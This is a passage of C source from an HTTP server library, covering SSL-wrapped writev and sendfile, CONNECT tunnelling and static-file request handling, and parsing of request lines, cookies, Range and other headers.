return frame_tcp_nbzc_recv(pcon->rcvstream, iodev_fd(pcon->pdev), num, err);
#endif
}
int http_con_writev (void * vcon, void * piov, int iovcnt, int * num, int * err)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
struct iovec * iov = (struct iovec *)piov;
void * pbyte;
int bytelen;
int wbytes;
int wlen = 0;
int i;
int ret = 0;
int sslerr = 0;
#endif
if (num) *num = 0;
if (err) *err = 0;
if (!pcon) return -1;
#ifdef HAVE_OPENSSL
if (!iov || iovcnt <= 0) return 0;
if (!pcon->ssl_link)
return tcp_writev(iodev_fd(pcon->pdev), piov, iovcnt, num, err);
if (!pcon->ssl) return -2;
for (i = 0; i < iovcnt; i++) {
pbyte = iov[i].iov_base;
bytelen = iov[i].iov_len;
for (wbytes = 0; wbytes < bytelen; ) {
ret = SSL_write(pcon->ssl, pbyte + wbytes, bytelen - wbytes);
if (ret > 0) {
wbytes += ret;
wlen += ret;
continue;
}
sslerr = SSL_get_error(pcon->ssl, ret);
if (num) *num = wlen;
if (ret == 0) {
if (sslerr == SSL_ERROR_ZERO_RETURN) {
if (err) *err = EBADF;
return -20;
} else {
if (err) *err = EBADF;
return -30;
}
} else { //ret < 0
if (sslerr == SSL_ERROR_WANT_READ) {
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_WANT_WRITE) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_SSL) {
if (err) *err = EPROTO;
} else if (sslerr == SSL_ERROR_SYSCALL) {
if (err) *err = errno;
if (errno == EAGAIN || errno == EWOULDBLOCK) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
return wlen;
}
} else {
if (err) *err = EINVAL;
}
return -30;
}
} //end for (wbytes = 0; wbytes < bytelen; )
}
if (num) *num = wlen;
return wlen;
#else
return tcp_writev(iodev_fd(pcon->pdev), piov, iovcnt, num, err);
#endif
}
int http_con_sendfile (void * vcon, int filefd, int64 pos, int64 size, int * num, int * err)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
static int mmapsize = 8192 * 1024;
void * pbyte = NULL;
void * pmap = NULL;
int64 maplen = 0;
#if defined(_WIN32) || defined(_WIN64)
HANDLE hmap;
int64 mapoff = 0;
#endif
size_t onelen = 0;
int64 wlen = 0;
int wbytes = 0;
int ret = 0;
int sslerr = 0;
#endif
if (num) *num = 0;
if (err) *err = 0;
if (!pcon) return -1;
if (filefd < 0) return -2;
#ifdef HAVE_OPENSSL
if (!pcon->ssl_link)
return tcp_sendfile(iodev_fd(pcon->pdev), filefd, pos, size, num, err);
if (!pcon->ssl) return -2;
for (wlen = 0; pos + wlen < size; ) {
onelen = size - wlen;
if (onelen > mmapsize) onelen = mmapsize;
#ifdef UNIX
pbyte = file_mmap(NULL, filefd, pos + wlen, onelen, PROT_READ, MAP_PRIVATE, &pmap, &maplen, NULL);
#elif defined(_WIN32) || defined(_WIN64)
pbyte = file_mmap(NULL, (HANDLE)filefd, pos + wlen, onelen, NULL, &hmap, &pmap, &maplen, &mapoff);
#endif
if (!pbyte) break;
for (wbytes = 0; wbytes < onelen; ) {
ret = SSL_write(pcon->ssl, pbyte + wbytes, onelen - wbytes);
if (ret > 0) {
wbytes += ret;
wlen += ret;
continue;
}
munmap(pmap, maplen);
if (num) *num = wlen;
sslerr = SSL_get_error(pcon->ssl, ret);
if (ret == 0) {
if (sslerr == SSL_ERROR_ZERO_RETURN) {
if (err) *err = EBADF;
return -20;
} else {
if (err) *err = EBADF;
return -30;
}
} else { //ret < 0
if (sslerr == SSL_ERROR_WANT_READ) {
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_WANT_WRITE) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
if (err) *err = EAGAIN;
return wlen;
} else if (sslerr == SSL_ERROR_SSL) {
if (err) *err = EPROTO;
} else if (sslerr == SSL_ERROR_SYSCALL) {
if (err) *err = errno;
if (errno == EAGAIN || errno == EWOULDBLOCK) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
return wlen;
}
} else {
if (err) *err = EINVAL;
}
return -30;
}
} //end for (wbytes = 0; wbytes < onelen; )
munmap(pmap, maplen);
}
if (num) *num = wlen;
return wlen;
#else
return tcp_sendfile(iodev_fd(pcon->pdev), filefd, pos, size, num, err);
#endif
}
<|start_filename|>src/http_handle.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include <signal.h>
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_con.h"
#include "http_request.h"
#include "http_cgi.h"
#include "http_listen.h"
#include "http_form.h"
#include "http_proxy.h"
#include "http_cache.h"
#include "http_handle.h"
int http_msg_handle (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
int ret = 0;
if (!pcon) return -1;
if (!msg) return -2;
if (msg->issued) return 0;
msg->state = HTTP_MSG_REQUEST_HANDLING;
switch (msg->req_methind) {
case HTTP_METHOD_CONNECT:
return http_connect_process(pcon, msg);
case HTTP_METHOD_DELETE:
case HTTP_METHOD_GET:
case HTTP_METHOD_HEAD:
case HTTP_METHOD_OPTIONS:
case HTTP_METHOD_POST:
case HTTP_METHOD_PUT:
case HTTP_METHOD_TRACE:
return http_request_process(pcon, msg);
default:
msg->SetStatus(msg, 405, NULL);
ret = msg->Reply(msg);
return ret;
}
return 1;
}
int http_tunnel_dns_resolve_cb (void * vmsg, char * name, int len, void * cache, int status)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPCon * pcon = NULL;
HTTPCon * tunnelcon = NULL;
if (!msg) return -1;
pcon = (HTTPCon *)msg->pcon;
if (!pcon) return -2;
if (status == DNS_ERR_IPV4 || status == DNS_ERR_IPV6) {
str_secpy(msg->dstip, sizeof(msg->dstip)-1, name, len);
} else if (dns_cache_getip(cache, 0, msg->dstip, sizeof(msg->dstip)-1) <= 0) {
msg->SetStatus(msg, 400, NULL);
return msg->Reply(msg);
}
msg->dstport = msg->req_port;
tunnelcon = http_proxy_connect_tunnel(pcon, msg);
if (tunnelcon == NULL && pcon->tunnelself == 0) {
msg->SetStatus(msg, 406, NULL);
return msg->Reply(msg);
}
msg->SetStatus(msg, 200, "Connection Established");
return msg->Reply(msg);
}
int http_connect_process (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPListen * hl = NULL;
if (!pcon) return -1;
if (!msg) return -2;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -3;
hl = (HTTPListen *)pcon->hl;
if (!hl) return -4;
/* if system configuraiton of current HTTP Listen does not allow forward proxy */
if (hl->forwardproxy == 0) {
/* CONNECT method is base upon Proxy mechanism */
msg->SetStatus(msg, 403, "Proxy is Forbidden");
return msg->Reply(msg);
}
/* system configuration does not allow CONNECT tunnel */
if (mgmt->proxy_tunnel == 0) {
msg->SetStatus(msg, 405, "CONNECT method not allowed");
return msg->Reply(msg);
}
if (dns_query(mgmt->pcore, msg->req_host, msg->req_hostlen,
http_tunnel_dns_resolve_cb, msg) < 0)
{
msg->SetStatus(msg, 400, NULL);
return msg->Reply(msg);
}
return 0;
}
int http_request_process (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
HTTPLoc * ploc = NULL;
HTTPMgmt * mgmt = NULL;
CacheInfo * cacinfo = NULL;
char path[1024];
int i, fret, ret = -100;
if (!pcon) return -1;
if (!msg) return -2;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -3;
hl = (HTTPListen *)pcon->hl;
if (!hl) return -4;
if (msg->cacheon && msg->res_file_cache >= 3) {
cacinfo = msg->res_cache_info;
if (msg->res_file_cache == 3) {
ret = msg->AddResFile(msg, msg->res_file_name, 0, -1);
} else if (cacinfo != NULL) {
ret = msg->AddResFile(msg, cacinfo->cache_tmp, 0, -1);
} else ret = -100;
if (ret < 0)
msg->SetStatus(msg, 404, NULL);
else
msg->SetStatus(msg, 200, NULL);
if (cacinfo && ret >= 0) {
http_cache_response_header(msg, cacinfo);
msg->SetResContentTypeID(msg, cacinfo->mimeid);
}
return msg->Reply(msg);
}
/* if system configuraiton of current HTTP Listen does not allow forward proxy */
if (msg->req_url_type > 0 && hl->forwardproxy == 0) {
msg->SetStatus(msg, 403, "Proxy is Forbidden");
return msg->Reply(msg);
}
/* if request is absolute URI and Location instance is NULL,
re-instanstiating is executed again. */
if (msg->req_url_type > 0 && msg->ploc == NULL) {
http_req_set_docuri(msg, frameP(msg->uri->uri), frameL(msg->uri->uri), 0, 0);
}
ploc = (HTTPLoc *)msg->ploc;
fret = msg->GetRealFile(msg, path, sizeof(path) - 1);
#ifdef _DEBUG
printf("####Path: %s\n", path);
#endif
if (msg->issued <= 0 && ploc && (ploc->type & SERV_CALLBACK) && ploc->cbfunc) {
msg->cbobj = ploc->cbobj;
ret = (*ploc->cbfunc)(ploc->cbobj, msg, ploc->tplfile ? ploc->tplfile : path);
}
if (msg->issued <= 0 && hl->cbfunc) {
msg->cbobj = hl->cbobj;
ret = (*hl->cbfunc)(hl->cbobj, msg, path);
}
if (msg->issued <= 0 && mgmt->req_handler) {
msg->cbobj = mgmt->req_cbobj;
ret = (*mgmt->req_handler)(mgmt->req_cbobj, msg, path);
}
/* if the upper callback handled and replied the request, the msg already recycled.
* some default handlings should be done by determining if the msg got correctly dealt with */
if (ret < 0 && msg->issued <= 0) {
if (!(ploc = (HTTPLoc *)msg->ploc)) {
msg->SetStatus(msg, 404, NULL);
return msg->Reply(msg);
}
if (strstr(path, "../")) {
msg->SetStatus(msg, 404, NULL);
return msg->Reply(msg);
}
if (fret > 0 && file_is_regular(path)) {
if (msg->AddResFile(msg, path, 0, -1) < 0)
msg->SetStatus(msg, 404, NULL);
else
msg->SetStatus(msg, 200, NULL);
return msg->Reply(msg);
} else if (file_is_dir(path)) {
ret = strlen(path);
for (i = 0; i < (int)ploc->indexnum; i++) {
sprintf(path + ret, "%s", ploc->index[i]);
if (file_is_regular(path)) {
if (msg->AddResFile(msg, path, 0, -1) < 0)
msg->SetStatus(msg, 404, NULL);
else
msg->SetStatus(msg, 200, NULL);
return msg->Reply(msg);
}
}
/* read the current directory to reply.
Caution: uncommenting following fractions is dangerous for
exposure of file system. please watch your step! */
/*ret = msg->DisplayDirectory(msg);
if (ret >= 0) return 0;*/
}
msg->SetStatus(msg, 404, NULL);
return msg->Reply(msg);
}
return ret;
}
<|start_filename|>include/http_srv_io.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SRV_IO_H_
#define _HTTP_SRV_IO_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_srv_send_probe (void * vcon);
int http_srv_send (void * vcon);
int http_srv_send_final (void * vmsg);
int http_srv_recv (void * vcon);
int http_srv_recv_parse (void * vcon);
int http_srv_resbody_parse (void * vcon, void * vmsg, int64 * offset, int64 * savedbytes);
int http_srv_con_lifecheck (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_script.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SCRIPT_H_
#define _HTTP_SCRIPT_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_script_s {
void * msg;
char * script;
int scriptlen;
/* 0-unknown 1-HTTPListen script 2-Host script 3-Location script */
uint8 sctype : 4;
uint8 replied : 1;
uint8 exitflag : 1;
uint8 reloc : 1;
uint8 alloc : 1;
char * retval;
int retvallen;
char * vname;
int vtype;
} http_script_t, HTTPScript;
void * http_script_alloc ();
int http_script_init (void * vhsc, void * vmsg, char * psc, int sclen, uint8 sctype, char * vname, int vtype);
void http_script_free (void * vhsc);
int http_script_parse_exec (void * vhsc, char * sc, int sclen);
int http_script_segment_exec (void * vmsg, char * psc, int sclen, char ** pval,
int * vallen, char * vname, int vtype);
int http_script_exec (void * vmsg);
int http_reply_script_exec (void * vmsg);
void script_parser_init ();
void script_parser_clean ();
void * script_parser_get (char * cmd, int len);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_request.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_header.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_con.h"
#include "http_request.h"
#include "http_cookie.h"
#include "http_sndpxy.h"
#include "http_listen.h"
#include "http_cgi.h"
/* Cookie management: parse, add, del, get */
int http_req_addcookie (void * vmsg, char * name, int namelen,
char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * punit = NULL;
HeaderUnit * phu = NULL;
if (!msg) return -1;
if (!name) return -2;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return -3;
if (value && valuelen < 0) valuelen = strlen(value);
mgmt = msg->httpmgmt;
punit = hunit_get (msg->req_cookie_table, name, namelen);
while (punit) {
phu = punit; punit = punit->next;
if (phu->valuelen == valuelen &&
strncasecmp(HUValue(phu), value, valuelen) ==0)
{
return 0;
}
}
punit = bpool_fetch(mgmt->header_unit_pool);
if (!punit) { return -5; }
punit->frame = msg->req_header_stream;
punit->name = name;
punit->namepos = HUPos(punit->frame, name);
punit->namelen = namelen;
punit->value = value;
punit->valuepos = HUPos(punit->frame, value);
punit->valuelen = valuelen;
punit->next = NULL;
if (!phu)
hunit_add(msg->req_cookie_table, name, namelen, punit);
else
phu->next = punit;
return 0;
}
int http_req_delallcookie (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
HeaderUnit * uiter = NULL;
int i, num;
if (!msg) return -1;
mgmt = msg->httpmgmt;
num = ht_num(msg->req_cookie_table);
for (i=0; i<num; i++) {
uiter = ht_value(msg->req_cookie_table, i);
while (uiter != NULL) {
unit = uiter; uiter = uiter->next;
bpool_recycle(mgmt->header_unit_pool, unit);
}
}
ht_zero(msg->req_cookie_table);
return 0;
}
HeaderUnit * http_req_getcookie (void * vmsg, char * name, int namelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
if (!msg) return NULL;
if (!name) return NULL;
if (namelen < 0) namelen = strlen(name);
if (namelen <= 0) return NULL;
punit = hunit_get (msg->req_cookie_table, name, namelen);
while (punit && punit->next) punit = punit->next;
return punit;
}
int http_req_parse_cookie (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * unit = NULL;
int nlen, vlen;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pn = NULL;
char * pv = NULL;
if (!msg) return -1;
unit = http_header_get(msg, 0, "Cookie", -1);
if (!unit) return -100;
if (unit->valuelen <= 0) return -101;
msg->req_cookie = HUValue(unit);
msg->req_cookie_len = unit->valuelen;
pbgn = HUValue(unit);
pend = pbgn + unit->valuelen;
while (pbgn < pend) {
pbgn = skipOver(pbgn, pend-pbgn, " \t;", 3);
if (pbgn >= pend) return -110;
pn = pbgn;
pbgn = skipTo(pbgn, pend-pbgn, ";", 1);
poct = skipTo(pn, pbgn-pn, "=", 1);
if (!poct || poct >= pbgn) continue;
pv = poct + 1;
poct = rskipOver(poct-1, poct-pn, " \t", 2);
if (poct < pn) continue;
nlen = poct - pn + 1;
vlen = pbgn - pv;
http_req_addcookie(msg, pn, nlen, pv, vlen);
}
return 0;
}
/* Request-Line = Method SP Request-URI SP HTTP-Version CRLF
*/
int http_req_reqline_decode (void * vmsg, char * pline, int linelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pval = NULL;
char * pend = NULL;
char * poct = NULL;
if (!msg) return -1;
if (!pline || linelen <= 0) return -2;
msg->req_line = pline;
msg->req_line_len = linelen - 1;
poct = pline; pend = pline + linelen;
/* parse for the field Request-Method */
pval = skipOver(poct, pend-poct, " \t\r\n;,", 6);
if (pval >= pend) return -100;
poct = skipTo(pval, pend-pval, " \t\r", 3);
http_req_set_reqmeth(msg, pval, poct-pval);
/* parse for the field Request-URI */
pval = skipOver(poct, pend-poct, " \t\r\n", 4);
if (pval >= pend) return -200;
poct = skipTo(pval, pend-pval, " \t\r", 3);
if (msg->req_methind == HTTP_METHOD_CONNECT) { //CONNECT method
/* A CONNECT method requests that a proxy establish a tunnel connection
on its behalf. The Request-URI portion of the Request-Line is always
an 'authority' as defined by URI Generic Syntax [2], which is to say
the host name and port number destination of the requested connection
separated by a colon:
CONNECT server.example.com:80 HTTP/1.1
Host: server.example.com:80
https://www.ietf.org/rfc/rfc2817 */
http_req_set_uri(msg, pval, poct-pval, 0);
} else {
if (http_req_set_uri(msg, pval, poct-pval, 0) > 0)
msg->req_url_type = 1;
}
/* parse for the field Request HTTP Version */
pval = skipOver(poct, pend-poct, " \t\r\n", 4);
if (pval >= pend) return -100;
poct = skipTo(pval, pend-pval, " \t\r", 3);
str_secpy(msg->req_ver, sizeof(msg->req_ver)-1, pval, poct-pval);
pval = skipTo(pval, poct-pval, "/", 1);
if (pval < poct) {
pval += 1;
msg->req_ver_major = str_to_int(pval, poct-pval, 10, (void **)&pval);
pval = skipOver(pval, poct-pval, ". \t", 3);
if (pval < poct)
msg->req_ver_minor = str_to_int(pval, poct-pval, 10, (void **)&pval);
}
return 0;
}
int http_req_reqline_encode (char * meth, int methlen, char * uri,
int urilen, char * ver, int verlen, frame_p frame)
{
if (!meth || methlen <= 0) return -2;
if (!uri || urilen <= 0) return -3;
if (!ver || verlen <= 0) return -4;
if (!frame) return -5;
frame_put_nlast(frame, meth, methlen);
frame_put_nlast(frame, " ", 2);
frame_put_nlast(frame, uri, urilen);
frame_put_nlast(frame, " ", 2);
frame_put_nlast(frame, ver, verlen);
frame_put_nlast(frame, "\r\n", 2);
return 0;
}
static char * g_http_req_meth[] = {
"-NONE-",
"CONNECT",
"DELETE",
"GET",
"HEAD",
"HTTP/1.0",
"HTTP/1.1",
"OPTIONS",
"POST",
"PUT",
"TRACE",
NULL
};
static int g_http_req_meth_num = sizeof(g_http_req_meth)/sizeof(char *) - 1;
int http_meth_index (char * meth)
{
int hi, mid, lo;
int ret = 0;
if (!meth || strlen(meth) <= 0) return 0;
hi = g_http_req_meth_num - 1;
lo = -1;
while (hi-lo > 1) {
mid = (hi + lo)/2;
ret = strcasecmp((char *)meth, g_http_req_meth[mid]);
if (ret < 0) hi = mid;
else if (ret > 0) lo = mid;
else return mid;
}
if (strcasecmp((char*)meth, g_http_req_meth[hi]) == 0) {
return hi;
}
return 0;
}
int http_req_set_reqmeth(void * vmsg, char * meth, int methlen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
int len = 0;
if (!msg) return -1;
if (!meth) return -2;
if (methlen < 0) len = strlen(meth);
else len = methlen;
if (len <= 0) return -3;
if (len > sizeof(msg->req_meth)-1)
len = sizeof(msg->req_meth)-1;
memcpy(msg->req_meth, meth, len);
msg->req_meth[len] = '\0';
msg->req_methind = http_meth_index(msg->req_meth);
return 0;
}
/* As HTTP Server not HTTP Proxy, the request-line from client only contains
* path and query, no scheme and host.
* To form a full URL, the value of "Host" is prepended to the requested URI.
*/
int http_req_set_absuri (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
int ret = 0;
if (!msg) return -1;
if (msg->req_methind == HTTP_METHOD_CONNECT) return 0;
http_uri_init(msg->absuri);
punit = http_header_get(msg, 0, "Host", 4);
if (punit) {
if (msg->ssl_link) {
frame_append(msg->absuri->uri, "https://");
} else {
frame_append(msg->absuri->uri, "http://");
}
frame_put_nlast(msg->absuri->uri, HUValue(punit), punit->valuelen);
}
if (msg->req_path && msg->req_pathlen > 0) {
frame_put_nlast(msg->absuri->uri, msg->req_path, msg->req_pathlen);
} else {
frame_put_last(msg->absuri->uri, '/');
}
if (msg->req_query && msg->req_querylen > 0) {
frame_append(msg->absuri->uri, "?");
frame_put_nlast(msg->absuri->uri, msg->req_query, msg->req_querylen);
}
ret = http_uri_parse(msg->absuri);
if (ret >= 0) {
msg->req_scheme = msg->absuri->scheme;
msg->req_schemelen = msg->absuri->schemelen;
msg->req_host = msg->absuri->host;
msg->req_hostlen = msg->absuri->hostlen;
msg->req_port = msg->absuri->port;
if (msg->req_port <= 0) {
if (msg->ssl_link)
msg->req_port = 443;
else
msg->req_port = 80;
}
}
return ret;
}
int http_req_set_docuri (void * vmsg, char * puri, int urilen, int decode, int instbrk)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
int ret = 0;
HTTPLoc * ploc = NULL;
char udoc[8192];
if (!msg) return -1;
/* new DocURI is completely same as original one, just return */
if (frameL(msg->docuri->uri) == urilen &&
strncasecmp(frameS(msg->docuri->uri), puri, urilen) == 0)
return 0;
ret = http_uri_set(msg->docuri, puri, urilen, decode);
if (ret < 0) return ret;
msg->req_path = msg->docuri->path;
msg->req_pathlen = msg->docuri->pathlen;
msg->req_query = msg->docuri->query;
msg->req_querylen = msg->docuri->querylen;
if (msg->uri->type > 0) {
msg->ssl_link = msg->docuri->ssl_link;
msg->req_scheme = msg->docuri->scheme;
msg->req_schemelen = msg->docuri->schemelen;
msg->req_host = msg->docuri->host;
msg->req_hostlen = msg->docuri->hostlen;
msg->req_port = msg->docuri->port;
}
if (instbrk) return 0;
http_loc_instance(msg);
/* if real file of request after intantiated is a directory,
check if its index files exists or not. if exists, set new doc-uri */
if (msg->req_methind != HTTP_METHOD_GET)
return 0; //only GET supported for directory request
ploc = (HTTPLoc *)msg->ploc;
if (!ploc) return -201;
if ((ploc->type & SERV_PROXY) || (ploc->type & SERV_FASTCGI))
return 0;
/* only directory request needs to append its index file */
if (msg->GetLocFile(msg, NULL, 0, NULL, 0, udoc, sizeof(udoc)-1) == 2) {
return http_req_set_docuri(msg, udoc, strlen(udoc), 0, 0);
}
return 0;
}
/* resolve the uri to break down into all fields */
int http_req_set_uri (void * vmsg, char * puri, int urilen, int decode)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
int ret = 0;
if (!msg) return -1;
ret = http_uri_set(msg->uri, puri, urilen, decode);
if (ret < 0) return ret;
msg->req_url_type = msg->uri->type;
if (msg->req_methind == HTTP_METHOD_CONNECT) {
/* It's an URL of CONNECT method.
eg. CONNECT content-autofill.googleapis.com:443 */
msg->req_url_type = 0;
msg->req_host = msg->uri->host;
msg->req_hostlen = msg->uri->hostlen;
msg->req_port = msg->uri->port;
return 0;
}
msg->req_path = msg->uri->path;
msg->req_pathlen = msg->uri->pathlen;
msg->req_query = msg->uri->query;
msg->req_querylen = msg->uri->querylen;
if (msg->uri->type > 0) {
/* It's an absolute URL */
msg->ssl_link = msg->uri->ssl_link;
msg->req_scheme = msg->uri->scheme;
msg->req_schemelen = msg->uri->schemelen;
msg->req_host = msg->uri->host;
msg->req_hostlen = msg->uri->hostlen;
msg->req_port = msg->uri->port;
}
return ret;
}
static char * str2int64 (char * pbgn, char * pend, int64 * pval)
{
int64 val = 0;
for (val = 0; pbgn && pbgn < pend && isdigit(*pbgn); pbgn++) {
val *= 10; val += *pbgn-'0';
}
if (pval) *pval = val;
return pbgn;
}
static int partial_item_parse (void * vbgn, int len, http_partial_t * part)
{
char * pbgn = (char *)vbgn;
char * pend = pbgn + len;
/*
Range: bytes=0-499 given range from 0 to 499, total 500 bytes
Range: bytes=500- given range from 500 to end, total bytes: size-500
Range: bytes=-200 indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
if (isdigit(*pbgn)) {
pbgn = str2int64(pbgn, pend, &part->start);
if (*pbgn == '-') pbgn += 1;
if (pbgn < pend && isdigit(*pbgn)) {
pbgn = str2int64(pbgn, pend, &part->end);
part->partflag = 1;
part->length = part->end + 1 - part->start;
} else {
part->partflag = 2;
part->end = -1;
part->length = -1;
}
return 1;
} else if (*pbgn == '-') {
pbgn += 1;
if (pbgn < pend && isdigit(*pbgn)) {
pbgn = str2int64(pbgn, pend, &part->length);
part->partflag = 3;
part->start = -1;
part->end = -1;
return 2;
}
}
return -10;
}
int http_partial_parse (void * vmsg, void * vbgn, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_partial_t part;
char * pbgn = (char *)vbgn;
char * pend = NULL;
char * plist[16];
int plen[16];
int i, num = 0;
if (!msg) return -1;
pend = pbgn + len;
/* Range: bytes=0-499 given range from 0 to 499, total 500 bytes
Range: bytes=500- given range from 500 to end, total bytes: size-500
Range: bytes=-200 indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
if (strncasecmp(pbgn, "bytes", 5) != 0) return -2;
pbgn += 5;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (pbgn >= pend || *pbgn != '=') return -3;
pbgn += 1;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (pbgn >= pend) return -4;
num = string_tokenize(pbgn, pend - pbgn, ",;", 2, (void **)plist, plen, 16);
if (num <= 0) return -2;
for (i = 0; i < num; i++) {
memset(&part, 0, sizeof(part));
if (partial_item_parse(plist[i], plen[i], &part) >= 0)
vstar_push(msg->partial_list, &part);
}
msg->partial_flag = vstar_num(msg->partial_list);
return 0;
}
int http_req_parse_header (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HeaderUnit * punit = NULL;
char * pover = NULL;
char * pcolon = NULL;
char * pend = NULL;
char * poct = NULL;
int ret = 0;
char * name = NULL;
char * value = NULL;
int namelen, valuelen;
if (!msg) return -1;
poct = frameP(msg->req_header_stream);
pover = poct + frameL(msg->req_header_stream);
poct = skipOver(poct, pover-poct, " \t\r\n", 4);
if (!poct || poct >= pover) return -100;
pend = memchr(poct, '\n', pover-poct);
if (!pend) return -100; /* has no line-terminal char */
ret = http_req_reqline_decode (msg, poct, pend-poct);
if (ret < 0) return -110;
for (poct = pend + 1; poct < pover; poct = pend + 1) {
pend = memchr(poct, '\n', pover - poct);
if (!pend || pend >= pover) break;
poct = skipOver(poct, pend-poct, " \t", 2);
if (!poct || poct >= pend) continue;
name = value = NULL; namelen = valuelen = 0;
name = poct;
pcolon = skipTo(poct, pend-poct, ":", 1);
if (!pcolon || pcolon>=pend) continue;
poct = rskipOver(pcolon-1, pcolon-name, " \t", 2);
if (poct >= name) namelen = poct-name+1;
else continue;
poct = skipOver(pcolon+1, pend-pcolon-1, " \t\r", 3);
if (poct >= pend) continue;
value = poct;
poct = rskipOver(pend-1, pend-poct, " \t\r", 3);
if (poct >= value) valuelen = poct-value+1;
else { value = NULL; valuelen = 0; }
http_header_add(msg, 0, name, namelen, value, valuelen);
}
http_req_parse_cookie(msg);
/* determine the body content format */
if (strncasecmp(msg->req_meth, "POST", 4) != 0 &&
strncasecmp(msg->req_meth, "PUT", 3) != 0)
{
if (strncasecmp(msg->req_meth, "CONNECT", 7) == 0)
msg->req_body_flag = BC_TUNNEL;
else
msg->req_body_flag = BC_NONE;
} else {
/* determine if the request body is encoded in the format of chunked */
punit = http_header_get(msg, 0, "Transfer-Encoding", -1);
if (punit) {
if (punit->valuelen != 7 ||
strncasecmp("chunked", HUValue(punit), 7) != 0)
{
msg->req_body_flag = BC_TE_INVALID;
} else {
msg->req_body_flag = BC_TE;
}
} else {
/* determine if the request body is counted in the format of Content-Length */
punit = http_header_get(msg, 0, "Content-Length", -1);
if (punit) {
msg->req_body_flag = BC_CONTENT_LENGTH;
msg->req_body_length = 0;
for (ret = 0; ret < punit->valuelen && !isdigit(*(HUValue(punit) + ret)); ret++);
for (; ret < punit->valuelen && isdigit(*(HUValue(punit) + ret)); ret++) {
msg->req_body_length *= 10;
msg->req_body_length += *(HUValue(punit) + ret) - '0';
}
} else {
msg->req_body_flag = BC_UNKNOWN;
}
}
}
/* determine if the request body is multipart form data */
punit = http_header_get(msg, 0, "Content-Type", -1);
if (punit) {
msg->req_content_type = HUValue(punit);
msg->req_contype_len = punit->valuelen;
if (strncasecmp(HUValue(punit), "multipart/form-data", 19) == 0)
msg->req_multipart = 1;
}
punit = http_header_get(msg, 0, "User-Agent", -1);
if (punit) {
msg->req_useragent = HUValue(punit);
msg->req_useragent_len = punit->valuelen;
}
/* determine if the request connection is keep-alive */
punit = http_header_get(msg, 0, "Proxy-Connection", -1);
if (punit) {
if (punit->valuelen == 10 && strncasecmp("keep-alive", HUValue(punit), 10) == 0) {
msg->req_conn_keepalive = 1;
} else {
msg->req_conn_keepalive = 0;
}
} else {
punit = http_header_get(msg, 0, "Connection", -1);
if (punit) {
if (punit->valuelen == 10 || strncasecmp("keep-alive", HUValue(punit), 10) == 0) {
msg->req_conn_keepalive = 1;
} else {
msg->req_conn_keepalive = 0;
}
} else {
msg->req_conn_keepalive = 0;
}
}
/* parse http partial request header:
Range: bytes=0-499 given range from 0 to 499, total 500 bytes
Range: bytes=500- given range from 500 to end, total bytes: size-500
Range: bytes=-200 indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
punit = http_header_get(msg, 0, "Range", -1);
if (punit) {
